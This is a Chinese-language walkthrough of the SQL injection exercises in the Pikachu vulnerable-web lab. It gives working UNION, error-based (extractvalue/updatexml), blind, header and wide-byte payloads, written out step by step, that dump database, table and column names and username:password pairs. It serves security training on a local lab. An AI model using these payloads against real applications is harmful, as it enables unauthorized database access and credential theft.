Pikachu-Sql Inject(SQL注入)

在owasp发布的top10排行榜里，注入漏洞一直是危害排名第一的漏洞，其中注入漏洞里面首当其冲的就是数据库注入漏洞。
一个严重的SQL注入漏洞，可能会直接导致一家公司破产！
SQL注入漏洞主要形成的原因是在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。 从而导致数据库受损（被脱裤、被删除、甚至整个服务器权限沦陷）。

在构建代码时，一般会从如下几个方面的策略来防止SQL注入漏洞：
1.对传进SQL语句里面的变量进行过滤，不允许危险字符传入；
2.使用参数化（Parameterized Query 或 Parameterized Statement）；
3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

---

数字型注入（post）

方法一：手工UNION联合查询注入

1.抓包发送到repeater模块，分别在id=1后面输入and 1=1与and 1=2

and 1=1 未报错

and  1=2 报错

2.暴出字段数，order by 2未报错，order by 3报错，说明只有两个字段

3.用联合查询暴出位置，id为错误值，id=0 union select 1,2

4.暴出数据库名，

id=0 union select 1,database()

5.暴出表名，

id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

6.管理员的账号密码可能在users表中，暴出列名，

id=0 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'

7.暴出值，

id=0 union select 1,group_concat(username,0x3a,password) from users

方法二：手工报错型注入

1.暴出库名，id为正确值，id=1 and extractvalue(1,concat(0x7e,(select database())))

2.暴出表名，

id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))

3.暴出列名，

id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))

4.未完全显示，使用not in暴出未显示的

5.暴出值，

id=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))，同理未显示的可以用not in暴出

方法三：自动注入sqlmap

不做累述。

---

字符型注入（get）

1.单引号测试，报错

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1'&submit=%E6%9F%A5%E8%AF%A2

2.添加注释符，未报错，确定为单引号字符型注入，

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' --+&submit=%E6%9F%A5%E8%AF%A2

3.暴出字段数，order by 2未报错，order by 3报错，说明只有两个字段，

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' order by 2 --+&submit=%E6%9F%A5%E8%AF%A2

4.爆出位置，

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,2 --+&submit=%E6%9F%A5%E8%AF%A2

5.暴出表名，

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%9F%A5%E8%AF%A2

6.暴出字段，

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&submit=%E6%9F%A5%E8%AF%A2

7.暴出值，

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,group_concat(username,0x3a,password) from users --+&submit=%E6%9F%A5%E8%AF%A2

数字型注入（post）的方法二、三同样适用于本题

---

搜索型注入

1.原理分析

select username,id,email from member where username like '%$name%'

这句SLQ语句就是基于用户输入的name的值在表member中搜索匹配username，但是如果输入 'and 1=1 and '%'=' 就变成了

select username,id,email from member where username like '%$name'and 1=1 and '%'='%'

·搜索型注入的判断方法：

1 搜索keywords‘，如果出错的话，有90%的可能性存在漏洞；
2 搜索 keywords%，如果同样出错的话，就有95%的可能性存在漏洞；
3 搜索keywords% 'and 1=1 and '%'='（这个语句的功能就相当于普通SQL注入的 and 1=1）看返回的情况
4 搜索keywords% 'and 1=2 and '%'='（这个语句的功能就相当于普通SQL注入的 and 1=2）看返回的情况
5 根据两次的返回情况来判断是不是搜索型文本框注入了

·下面方法也可以测试

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='

2.判断是否可注入，尝试构造

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%'  &submit=%E6%90%9C%E7%B4%A2，报错

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' --+&submit=%E6%90%9C%E7%B4%A2，未报错

3.暴字段数，order by 3未报错

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' order by 4 --+&submit=%E6%90%9C%E7%B4%A2

4.爆出位置，

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,3 --+&submit=%E6%90%9C%E7%B4%A2

5.暴出表名，

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%90%9C%E7%B4%A2

6.暴出列名，

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+&submit=%E6%90%9C%E7%B4%A2

7.暴出值，

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,group_concat(username,0x3a,password) from users --+&submit=%E6%90%9C%E7%B4%A2

---

xx型注入

1.先单引号测试判断，

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0' &submit=%E6%9F%A5%E8%AF%A2#

2.报这样的错，尝试构造，

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') &submit=%E6%9F%A5%E8%AF%A2#，报错

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') --+&submit=%E6%9F%A5%E8%AF%A2#，未报错

3.判断字段数，order by 2未报错

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') order by 3--+&submit=%E6%9F%A5%E8%AF%A2#

4.爆出位置，

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,2 --+&submit=%E6%9F%A5%E8%AF%A2#

5.暴出表名，

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%9F%A5%E8%AF%A2#

6.暴出列名，

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&submit=%E6%9F%A5%E8%AF%A2#

7.暴出值，

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,group_concat(username,0x3a,password) from users --+&submit=%E6%9F%A5%E8%AF%A2#

---

insert/update注入

1.用单引号判断，

2.存在注入，前面的单引号闭合前面的单引号，后面的单引号闭合后面的单引号，两个or之间就可以填入我们的代码，可以直接把报错的代码插入进去，暴出库名，

' or updatexml(1,concat(0x7e,(database())),0) or '

3.同理，暴出表，

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0) or '

4.暴出列名

' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),0) or '

5.暴出值

' or updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)),0) or '

---

delete注入

1.删除留言同时抓包，发送到repeater模块，可以在repeater里面的id进行闭合操作，因为它传的是个id是个 数字型，所以我们不需要用单引号进行闭合，

因为这个参数实在uil里面提交的，所以我们需要在burp上对这个payload做一个URL的编码

2.暴出库名，

id=63+or+updatexml(1,concat(0x7e,(select+database())),0)

3.暴出表名，

id=63+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3ddatabase())),0)

4.暴出列名，

id=63+or+updatexml(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_name%3d'users')),0)

5.暴出值，

id=63+or+updatexml(1,concat(0x7e,(select+group_concat(username,0x3a,password)+from+users)),0)

---

http header注入

1.输入数据查看，

2.抓包查看，发送到repeater模块，把Accept中的内容删掉，加上单引号测试，报错，说明可能有注入，

3.构造payload，暴出库名，

User-Agent: ' or updatexml(1,concat(0x7e,(select database())),0) or '

4.暴出表名，

User-Agent: ' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0) or '

5.暴出列名，

User-Agent: ' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),0) or '

6.暴出值，

User-Agent: ' or updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)),0) or '

---

盲注（base on boolian）

1.基于布尔的盲注（boolean），判断，

kobe' and 1=1#

2.逐字节猜解，

报错：kobe' and ascii(substr(database(),1,1))>112#

未报错：kobe' and ascii(substr(database(),1,1))=112#

3.这样逐字节猜解库名、表名、列名和值，过于繁琐，建议使用工具。

---

盲注（base on time）

1.基于时间的盲注，判断，响应时间差不多五秒，存在注入，

kobe' and sleep(5)#

2.猜解暴库，

秒响应：kobe' and if((substr(databese(),1,1))='s',sleep(5),null)#

响应时间五秒：kobe' and if((substr(databese(),1,1))='p',sleep(5),null)#

说明库名第一个首字母为p

3.继续猜解，过于繁琐，建议使用工具

---

宽字节注入

1.在magic_quotes_gpc=On的情况下，提交的参数中如果带有单引号’，就会被自动转义\’，使很多注入攻击无效，

GBK双字节编码：一个汉字用两个字节表示，首字节对应0×81-0xFE，尾字节对应0×40-0xFE（除0×7F），刚好涵盖了转义符号对应的编码0×5C。

0xD50×5C 对应了汉字“诚”，URL编码用百分号加字符的16进制编码表示字符，于是 %d5%5c 经URL解码后为“诚”。

2.输入%d5'，报错，存在宽字节注入，

3.暴字段位数，order by 2未报错，order by 3报错，存在两个字段，

4.爆出位置，

name=1%d5' union select 1,2 --+

5.暴出表名，

name=1%d5' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+

6.暴出列名，table_name='users' 也存在单引号，需要把users十六进制编码0x7573657273，

name=1%d5' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

7.暴出值，

name=1%d5' union select 1,group_concat(username,0x3a,password) from users --+

---